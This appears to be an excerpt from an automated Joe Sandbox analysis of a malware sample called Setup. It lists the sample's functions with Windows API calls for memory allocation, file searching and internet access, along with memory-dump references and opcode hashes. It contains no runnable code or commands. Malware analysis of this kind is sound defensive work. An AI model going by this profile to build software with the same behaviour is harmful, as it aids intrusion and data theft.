                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(00000000,?,?), ref: 02DC2637
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                                                                                                      • String ID: .dll
                                                                                                                                                                                                                                                      • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                                      • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                      • Instruction ID: 5a5c4ea598fc488ed728ed702c4e876aa84583ab47a72dae3ae8cd674113a3b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C82106726006C68FD722DFA8C858B6A7BA4EF05324F28406DDC01CBB41DB30EC45CB90
                                                                                                                                                                                                                                                      Function 031D258E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25A4
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,031DA896,?,00000000,?,?,031DAB37,?,00000007,?,?,031DB0EC,?,?), ref: 031D25AF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                                      • Opcode ID: a6e709de71434058b9a5cd73eaa807ce69a96d708a7b262a6be8ecc60903502b
                                                                                                                                                                                                                                                      • Instruction ID: 97a5c5d09abb9774dd7d1df985fffaa758069d951a54d947f7dd80ecc08e57d5
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6e709de71434058b9a5cd73eaa807ce69a96d708a7b262a6be8ecc60903502b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B3E08C36504304ABCB22BFA5AC0CBCA7BA8AB8D396F144464FA188B050DF35869197E0
                                                                                                                                                                                                                                                      Function 031D4CC0 Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,031D5105,00000000,00000000,00000000), ref: 031D4FC4
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InformationTimeZone
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 565725191-0
                                                                                                                                                                                                                                                      • Opcode ID: b6f7d48838ab4dd15fcbc66b3f92c51f73711c1d77119c87461b1cb8e12e78c6
                                                                                                                                                                                                                                                      • Instruction ID: 4f53de241d897347093da1d83ba9ec7f894666a8bc5aea32ac0c9cf4325bd1d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b6f7d48838ab4dd15fcbc66b3f92c51f73711c1d77119c87461b1cb8e12e78c6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21C11576900221ABDB14FF6ADC05ABEB7B9EF0E710F584056E905EF280EF719A51C790
                                                                                                                                                                                                                                                      Function 0319EF40 Relevance: 1.8, APIs: 1, Instructions: 271COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0319F1C7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 0f0efa303d524cd805e6843cfb737dafd762663b3d8456c8b888b3299e122b9a
                                                                                                                                                                                                                                                      • Instruction ID: dc56a0a123b43b46ead82e4b9f6c88c0dfdfb7db5ac934c85a085834b1566604
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f0efa303d524cd805e6843cfb737dafd762663b3d8456c8b888b3299e122b9a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C9151B5D00219AFDF14DFA8D985AAEBBF9EB4C310F14422AE415E7340E731A911CBA1
                                                                                                                                                                                                                                                      Function 03185030 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0318534B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 22707f0215b3e1bf276bc9d7fdcd4092c5fa7a578dd2d05ef2e3435754bc8efe
                                                                                                                                                                                                                                                      • Instruction ID: 47c0214e2d56ee270b2f398bdce7b52f83659dd66764fddee492c239aa23ff8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22707f0215b3e1bf276bc9d7fdcd4092c5fa7a578dd2d05ef2e3435754bc8efe
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B123B4900649DFCB04DFA8C454B9EFBF1AF0E314F28819AD459AB381D775A985CFA0
                                                                                                                                                                                                                                                      Function 0318B970 Relevance: 1.6, APIs: 1, Instructions: 125COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0318BA9F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 3e507e2b363f35b7c666b17184b7ccce68f3c8efa3f85ebbed08f307fc1d9b8a
                                                                                                                                                                                                                                                      • Instruction ID: fc039037d23a0df2e42afaf6fac5bfe170cd51f1e9316c39db8d4d1698173e80
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e507e2b363f35b7c666b17184b7ccce68f3c8efa3f85ebbed08f307fc1d9b8a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F313976E082149BCB15EF6CC8806AEFBA5AF8C210F18827DE815CB341DB30DE558BD5
                                                                                                                                                                                                                                                      Function 0318B800 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0318B962
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                                                                                                                                      • Opcode ID: 206aad9a0ce8c206c26a0ad53783d3020cc66e58d237fc87b4108a0642ed21a2
                                                                                                                                                                                                                                                      • Instruction ID: ce272625ba6178051ef1ceb7e0e41aba6a201efd972f4f7fc8ce9dfacbf9ec09
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 206aad9a0ce8c206c26a0ad53783d3020cc66e58d237fc87b4108a0642ed21a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE41DAB5C052189BCB10EFA8C45039EFBB0AF0D314F24826ED819AB380D7366A41CB94
                                                                                                                                                                                                                                                      Function 03178BF0 Relevance: 1.6, APIs: 1, Instructions: 115networkCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 031A71D0: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,03205040), ref: 031A7297
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000,00000000), ref: 03178D4C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharConcurrency::cancel_current_taskInternetMultiOpenWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1314137346-0
                                                                                                                                                                                                                                                      • Opcode ID: 9f0f794d4bb7e779393de3a29f3f331aa29fb9004e48ad070f2bfb1fe19e6630
                                                                                                                                                                                                                                                      • Instruction ID: 45646e40074b2c62e41bcf4f6e44977275e1ea7fcd06243c62944b0b3440d67f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f0f794d4bb7e779393de3a29f3f331aa29fb9004e48ad070f2bfb1fe19e6630
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941A274E05748EFEB00EF6CC90679D7BB4AF1A708F24428DE4106F282D7B55A458BE1
                                                                                                                                                                                                                                                      Function 03186050 Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 03186133
                                                                                                                                                                                                                                                        • Part of subcall function 03176690: ___std_exception_copy.LIBVCRUNTIME ref: 031766F1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task___std_exception_copy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1979911387-0
                                                                                                                                                                                                                                                      • Opcode ID: 6f5f70675a0dd72d2cb271fe454dbf36cb1dfdbcf4076556be9d1db4f8caf449
                                                                                                                                                                                                                                                      • Instruction ID: 2d56e4d42c0c1f5c80f2ae95b67dea99350a625dfb51a7d1397b9ef729d4b18b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f5f70675a0dd72d2cb271fe454dbf36cb1dfdbcf4076556be9d1db4f8caf449
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4314B75E007055BC714EF68D840699F7A4EF58311F18037AEA19CF292EB329A90CBE5
                                                                                                                                                                                                                                                      Function 02DC11F7 Relevance: 1.6, APIs: 1, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02DC1271
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                                                                      • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                      • Instruction ID: d5def14d654afcd664d75d2fe95ddbf6beae949d4182bdf64a0d9746b21be649
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AB1C272500727EBDB219E608C84BABB7B9FF09304F24052DE99E97242E731E951CB61
                                                                                                                                                                                                                                                      Function 031A763E Relevance: 1.6, APIs: 1, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 031766F1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2659868963-0
                                                                                                                                                                                                                                                      • Opcode ID: 4c72becdc59a706adb9c56fb622e4bb5767cd35bd6b2952a67e5204627c4c06e
                                                                                                                                                                                                                                                      • Instruction ID: e1dc73ba093b14494fb715a89aac1b295d1df62b3454a26b8fe7d16e1a5e9bac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c72becdc59a706adb9c56fb622e4bb5767cd35bd6b2952a67e5204627c4c06e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB21BB79804709AFD714DF98ED04799B7FCEB0D720F10461AF914AB680E771A6408794
                                                                                                                                                                                                                                                      Function 031A5070 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?,03205040), ref: 031A50C2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FolderPath
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1514166925-0
                                                                                                                                                                                                                                                      • Opcode ID: f5ec9a7be7edb0fc1b1d37adace73d255187a053b4c0e20be07adbbd422d195a
                                                                                                                                                                                                                                                      • Instruction ID: 81f7f9937fe93cf2e949b8c1652930ddd2c643f2758e191ad1ec9cf620e69741
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5ec9a7be7edb0fc1b1d37adace73d255187a053b4c0e20be07adbbd422d195a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1121D274A0471C9FEB28DF14DC56BEABBB8EB09B04F00429EE5065B280DB752A44CF90
                                                                                                                                                                                                                                                      Function 031BF9CE Relevance: 1.5, APIs: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,031766AC,?,?,?,?,031766AC,?,0320384C), ref: 031BFA2E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 6842923-0
                                                                                                                                                                                                                                                      • Opcode ID: ac89306c7a570194f3b69e65223b5071611b56abde6385ad5b53a5cac44bb6c3
                                                                                                                                                                                                                                                      • Instruction ID: 8f9c5ea33b0022f0b4e96580795d263cc779e5040bb36dd7739ebd9ac9c87587
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac89306c7a570194f3b69e65223b5071611b56abde6385ad5b53a5cac44bb6c3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A018475A00209DFC705DF6DE980B9EBBB9FF4DB40F164059E905AB390D7709A01CB90
                                                                                                                                                                                                                                                      Function 031D2531 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?), ref: 031D2572
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      • Opcode ID: 162a495cb8859cb3098a0430d5fcb4c2d2fb3ef2f3858b7b316fb7e0c9618b79
                                                                                                                                                                                                                                                      • Instruction ID: 53b8557830cd6a06265e8a69d0dee0c019ce70e0dcc17434f7c9ff7052724a57
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 162a495cb8859cb3098a0430d5fcb4c2d2fb3ef2f3858b7b316fb7e0c9618b79
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCF0BB35A4832467DF25EA669C24FD6B7599B5F760B094811E825EB140CB70D91382E0
                                                                                                                                                                                                                                                      Function 031D3B1C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?), ref: 031D3B4E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                                      • Opcode ID: 7e1ecbe2c799898d14e250d199356a27a6e49591cdb72e582736716459d216c7
                                                                                                                                                                                                                                                      • Instruction ID: b799c14a07c1438233841e21fbd85461ceebd707b8929123829730bcc4598510
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e1ecbe2c799898d14e250d199356a27a6e49591cdb72e582736716459d216c7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6E02B3D2057616BDA22B6699C01B5BB74C9F5F7B0F0D0425DD25AB1C0CF10D80082F7
                                                                                                                                                                                                                                                      Function 03171200 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 03171239
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InfoNativeSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1721193555-0
                                                                                                                                                                                                                                                      • Opcode ID: 729503e3fdcd7087415b54d7f1c867bb06d68f97d45991833b7a65d132a83132
                                                                                                                                                                                                                                                      • Instruction ID: 1bf6beae53852d331eaf9e1734b66ad893685889fee30beeca25179fb1dff3bb
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 729503e3fdcd7087415b54d7f1c867bb06d68f97d45991833b7a65d132a83132
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A4F0B8B4C0820CABD700EFA8AD86699B7F4EF08225F504269DD4167280FB306A598AD2

                                                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                                                      Function 0317BF90 Relevance: 21.2, APIs: 12, Strings: 1, Instructions: 1732memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0318B460: Concurrency::cancel_current_task.LIBCPMT ref: 0318B532
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317CA1A
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317CA21
                                                                                                                                                                                                                                                        • Part of subcall function 03182A20: NtQueryAttributesFile.NTDLL ref: 03182B25
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: NtCreateFile.NTDLL ref: 031A5433
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: GetProcessHeap.KERNEL32 ref: 031A5459
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 031A5463
                                                                                                                                                                                                                                                        • Part of subcall function 031A5280: NtReadFile.NTDLL ref: 031A5493
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317CE03
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317D1E4
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317D1EB
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317D5BF
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317D99A
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317D9A1
                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00000001,?,?,?,?,?,00000002), ref: 0317DD5E
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317DD65
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317D5C6
                                                                                                                                                                                                                                                        • Part of subcall function 03186050: Concurrency::cancel_current_task.LIBCPMT ref: 03186133
                                                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,00000001,?,?,?,?,?,00000002), ref: 0317CE0A
                                                                                                                                                                                                                                                        • Part of subcall function 0318B220: Concurrency::cancel_current_task.LIBCPMT ref: 0318B36D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Heap$Process$Free$Concurrency::cancel_current_taskFile$AllocateAttributesCreateQueryRead
                                                                                                                                                                                                                                                      • String ID: #
                                                                                                                                                                                                                                                      • API String ID: 4111404930-1885708031
                                                                                                                                                                                                                                                      • Opcode ID: d17ef79a577013ce7e240e0dc1f513c680c415a4053e477ff87c19d977c567ec
                                                                                                                                                                                                                                                      • Instruction ID: 8923ae6471af76cbfca99a9ccc5e07570f070db395811f74f142bb198c9e94f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d17ef79a577013ce7e240e0dc1f513c680c415a4053e477ff87c19d977c567ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C135770C00399CBEB25EB64CD54BEEBBB1AF59304F1482D9D0192B291DBB55B88CF91
                                                                                                                                                                                                                                                      Function 0317DED0 Relevance: 13.9, APIs: 9, Instructions: 376fileCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 0317DF52
                                                                                                                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,00000000,?,?), ref: 0317E074
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,?,031F675C,00000001,?,?,00000002), ref: 0317E1D0
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0317E29F
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0317E2AE
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0317E2E2
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?), ref: 0317E301
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0317E30D
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?), ref: 0317E3D0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
